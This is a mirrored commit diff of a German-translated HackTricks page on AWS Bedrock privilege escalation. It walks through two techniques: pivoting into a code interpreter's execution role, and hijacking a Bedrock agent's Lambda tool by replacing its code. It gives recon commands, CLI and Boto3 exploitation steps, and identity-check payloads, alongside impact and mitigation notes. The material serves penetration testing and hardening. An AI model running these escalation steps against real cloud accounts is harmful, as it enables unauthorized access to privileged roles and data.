gitea-mirror/hacktricks-cloud
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks-cloud.git synced 2026-04-28 12:03:08 -07:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['', 'src/pentesting-cloud/aws-security/aws-privilege-escalat

Browse Source
This commit is contained in:
Translator
2026-04-21 08:21:03 +00:00
parent acc5671e64
commit 082eaf8961
1 changed files with 95 additions and 26 deletions
Download Patch File Download Diff File Expand all files Collapse all files

121
src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-bedrock-privesc/README.md
View File

@@ -6,32 +6,32 @@
### `bedrock-agentcore:StartCodeInterpreterSession` + `bedrock-agentcore:InvokeCodeInterpreter` - Code Interpreter Execution-Role Pivot
AgentCore Code Interpreter ist eine verwaltete Ausführungsumgebung. **Custom Code Interpreters** können mit einer **`executionRoleArn`** konfiguriert werden, die „Berechtigungen für den Code Interpreter bereitstellt, um auf AWS-Services zuzugreifen“.
AgentCore Code Interpreter ist eine verwaltete Ausführungsumgebung. **Custom Code Interpreters** können mit einem **`executionRoleArn`** konfiguriert werden, der „Berechtigungen bereitstellt, damit der code interpreter auf AWS services zugreifen kann“.
Wenn ein **lower-privileged IAM principal** eine Code Interpreter-Session **starten + aufrufen** kann, die mit einer **privilegierteren execution role** konfiguriert ist, kann der Anrufer effektiv **in die Berechtigungen der execution role pivoten** (lateral movement / privilege escalation, je nach Umfang der Rolle).
Wenn ein **niedriger privilegierter IAM principal** eine Code Interpreter-Session **starten + aufrufen** kann, die mit einer **höher privilegierten execution role** konfiguriert ist, kann der Aufrufer effektiv in die Berechtigungen der execution role **pivotieren** (lateral movement / privilege escalation, abhängig vom Umfang der Rolle).
> [!NOTE]
> Dies ist typischerweise ein **misconfiguration / excessive permissions**-Problem (z. B. weitreichende Berechtigungen für die interpreter execution role und/oder breite Invoke-Rechte).
> AWS warnt ausdrücklich davor, Privilege Escalation zu vermeiden, indem execution roles **gleich oder weniger** Berechtigungen haben als die Identitäten, die zum Invoke berechtigt sind.
> Dies ist typischerweise ein **misconfiguration / excessive permissions**-Problem (zu breite Berechtigungen für die interpreter execution role und/oder zu weit gefasster invoke access).
> AWS warnt ausdrücklich davor, privilege escalation zu vermeiden, indem sichergestellt wird, dass execution roles **gleiche oder weniger** Privilegien haben als die Identitäten, die sie aufrufen dürfen.
#### Preconditions (common misconfiguration)
- Ein **custom code interpreter** existiert mit einer überprivilegierten **execution role** (z. B. Zugriff auf sensitive S3/Secrets/SSM oder IAM-admin-ähnliche Fähigkeiten).
- Es existiert ein **custom code interpreter** mit einer überprivilegierten **execution role** (z. B. Zugriff auf sensible S3/Secrets/SSM oder IAM-admin-like capabilities).
- Ein Benutzer (developer/auditor/CI identity) hat Berechtigungen für:
- Sessions starten: `bedrock-agentcore:StartCodeInterpreterSession`
- Tools aufrufen: `bedrock-agentcore:InvokeCodeInterpreter`
- (Optional) Der Benutzer kann auch Interpreter erstellen: `bedrock-agentcore:CreateCodeInterpreter` (ermöglicht ihnen, je nach org guardrails, einen neuen Interpreter zu erstellen, der mit einer execution role konfiguriert ist).
- Sessions starten: `bedrock-agentcore:StartCodeInterpreterSession`
- Tools aufrufen: `bedrock-agentcore:InvokeCodeInterpreter`
- (Optional) Der Benutzer kann auch Interpreter erstellen: `bedrock-agentcore:CreateCodeInterpreter` (erlaubt das Erstellen eines neuen Interpreters, der mit einer execution role konfiguriert ist, abhängig von den org guardrails).
#### Recon (identify custom interpreters and execution role usage)
Liste Interpreter (control-plane) und untersuche ihre Konfiguration:
List interpreters (control-plane) and inspect their configuration:
```bash
aws bedrock-agentcore-control list-code-interpreters
aws bedrock-agentcore-control get-code-interpreter --code-interpreter-id <CODE_INTERPRETER_ID>
````
> Der create-code-interpreter-Befehl unterstützt `--execution-role-arn`, der festlegt, welche AWS-Berechtigungen der Interpreter haben wird.
```
> Der Befehl create-code-interpreter unterstützt `--execution-role-arn`, der festlegt, welche AWS-Berechtigungen der Interpreter haben wird.
#### Schritt 1 - Sitzung starten (dies gibt eine `sessionId` zurück, keine interaktive Shell)
#### Schritt 1 - Starte eine Session (dies gibt eine `sessionId` zurück, keine interaktive Shell)
```bash
SESSION_ID=$(
aws bedrock-agentcore start-code-interpreter-session \
@@ -43,11 +43,11 @@ aws bedrock-agentcore start-code-interpreter-session \
echo "SessionId: $SESSION_ID"
```
#### Schritt 2 - Codeausführung aufrufen (Boto3 oder signiertes HTTPS)
#### Schritt 2 - Codeausführung ausführen (Boto3 oder signiertes HTTPS)
Es gibt **keine interaktive Python-Shell** durch `start-code-interpreter-session`. Die Ausführung erfolgt über **InvokeCodeInterpreter**.
Es gibt **keine interaktive python shell** von `start-code-interpreter-session`. Die Ausführung erfolgt über **InvokeCodeInterpreter**.
**Option A - Boto3-Beispiel (Python ausführen + Identität überprüfen):**
**Option A - Boto3-Beispiel (Python ausführen + Identität verifizieren):**
```python
import boto3
@@ -68,9 +68,9 @@ arguments={
for event in resp.get("stream", []):
print(event)
```
Wenn der Interpreter mit einer Ausführungsrolle konfiguriert ist, sollte die Ausgabe von `sts:GetCallerIdentity()` die Identität dieser Rolle widerspiegeln (nicht den low-priv caller) und damit den Pivot demonstrieren.
Wenn der Interpreter mit einer Ausführungsrolle konfiguriert ist, sollte die Ausgabe von `sts:GetCallerIdentity()` die Identität dieser Rolle widerspiegeln (nicht die des Low-Priv-Aufrufers), was den Pivot demonstriert.
**Option B - Signierter HTTPS-Aufruf (awscurl):**
**Option B - Signed HTTPS call (awscurl):**
```bash
awscurl -X POST \
"https://bedrock-agentcore.<Region>.amazonaws.com/code-interpreters/<CODE_INTERPRETER_IDENTIFIER>/tools/invoke" \
@@ -87,20 +87,88 @@ awscurl -X POST \
}
}'
```
#### Auswirkungen
#### Impact
* **Lateral movement** in jeglichen AWS-Zugriff, den die interpreter execution role hat.
* **Privilege escalation** wenn die interpreter execution role mehr Berechtigungen hat als der Aufrufer.
* Schwerer zu erkennen, wenn CloudTrail data events für interpreter invocations nicht aktiviert sind (Aufrufe werden je nach Konfiguration möglicherweise nicht standardmäßig protokolliert).
* **Lateral movement** in whatever AWS access the interpreter execution role has.
* **Privilege escalation** if the interpreter execution role is more privileged than the caller.
* Schwerere Erkennung, wenn CloudTrail data events für interpreter invocations nicht aktiviert sind (Invocations werden je nach Konfiguration möglicherweise nicht standardmäßig geloggt).
#### Gegenmaßnahmen / Härtung
#### Mitigations / Hardening
* **Least privilege** für die interpreter `executionRoleArn` (behandle diese wie Lambda execution roles / CI roles).
* **Least privilege** auf dem interpreter `executionRoleArn` (behandle es wie Lambda execution roles / CI roles).
* **Restrict who can invoke** (`bedrock-agentcore:InvokeCodeInterpreter`) und wer Sessions starten kann.
* Verwende **SCPs**, um InvokeCodeInterpreter zu verweigern, außer für genehmigte agent runtime roles (Durchsetzung auf Organisationsebene kann notwendig sein).
* Aktiviere geeignete **CloudTrail data events** für AgentCore, wo zutreffend; alarmiere bei unerwarteten Aufrufen und Session-Erstellungen.
* Verwende **SCPs**, um InvokeCodeInterpreter zu verweigern, außer für genehmigte agent runtime roles (org-level enforcement kann notwendig sein).
* Aktiviere passende **CloudTrail data events** für AgentCore, wo anwendbar; alarmiere bei unerwarteten invocations und session creation.
## Referenzen
## Amazon Bedrock Agents
### `lambda:UpdateFunctionCode`, `bedrock:InvokeAgent` - Agent Tool Hijacking via Lambda
Bedrock Agents können **Lambda-backed action groups** als tools (external execution) verwenden. Wenn ein principal den Code einer von einem agent verwendeten Lambda function **ändern** kann und anschließend den **agent invokieren** kann, kann er attacker-controlled code unter der **Lambda execution role** ausführen.
> [!NOTE]
> Dies ist ein **cross-service trust abuse** (Bedrock → Lambda), keine vulnerability. Der attacker kann die Lambda möglicherweise nicht direkt invokieren, aber sie trotzdem über den agent triggern.
#### Preconditions (common misconfiguration)
- Ein Bedrock Agent existiert mit einer **action group, die von einer Lambda function unterstützt wird**
- Der attacker hat:
- `lambda:UpdateFunctionCode`
- `bedrock:InvokeAgent`
- Die Lambda execution role hat breitere permissions als der attacker
- Der attacker kann die vom agent verwendete Lambda identifizieren
#### Recon
Enumerate agent action groups:
```bash
aws bedrock-agent list-agents
aws bedrock-agent get-agent --agent-id <AGENT_ID>
aws bedrock-agent list-agent-action-groups --agent-id <AGENT_ID> --agent-version DRAFT
```
Lambda inspizieren:
```bash
aws lambda get-function --function-name <FUNCTION_NAME>
```
#### Exploitation
Lambda-Code ersetzen:
```bash
zip payload.zip lambda_function.py
aws lambda update-function-code \
--function-name <FUNCTION_NAME> \
--zip-file fileb://payload.zip
```
Beispiel-Payload:
```python
import boto3
def lambda_handler(event, context):
return boto3.client("sts").get_caller_identity()
```
Via Agent auslösen:
```bash
aws bedrock-agent-runtime invoke-agent \
--agent-id <AGENT_ID> \
--agent-alias-id <ALIAS_ID> \
--session-id test \
--input-text "trigger tool"
```
#### Impact
* **Privilege escalation** into Lambda execution role
* **Data exfiltration** from AWS services
* **Cross-service abuse** via trusted agent execution
#### Mitigations
* **Restrict** `lambda:UpdateFunctionCode`
* Use **least-privilege** Lambda roles
* **Monitor** Lambda code changes
* **Audit** Bedrock agent tool usage
## References
- [Sonrai: AWS AgentCore privilege escalation path (SCP mitigation)](https://sonraisecurity.com/blog/aws-agentcore-privilege-escalation-bedrock-scp-fix/)
- [Sonrai: Credential exfiltration paths in AWS code interpreters (MMDS)](https://sonraisecurity.com/blog/sandboxed-to-compromised-new-research-exposes-credential-exfiltration-paths-in-aws-code-interpreters/)
@@ -108,6 +176,7 @@ awscurl -X POST \
- [AWS CLI: start-code-interpreter-session (returns `sessionId`)](https://docs.aws.amazon.com/cli/latest/reference/bedrock-agentcore/start-code-interpreter-session.html)
- [AWS Dev Guide: Code Interpreter API reference examples (Boto3 + awscurl invoke)](https://docs.aws.amazon.com/bedrock-agentcore/latest/devguide/code-interpreter-api-reference-examples.html)
- [AWS Dev Guide: Security credentials management (MMDS + privilege escalation warning)](https://docs.aws.amazon.com/bedrock-agentcore/latest/devguide/security-credentials-management.html)
- [SoftwareSecured: AWS Privilege Escalation Techniques (Bedrock agent tool hijacking)](https://www.softwaresecured.com/post/aws-privilege-escalation-iam-risks-service-based-attacks-and-new-ai-driven-bedrock-agentcore-vectors)
{{#include ../../../../banners/hacktricks-training.md}}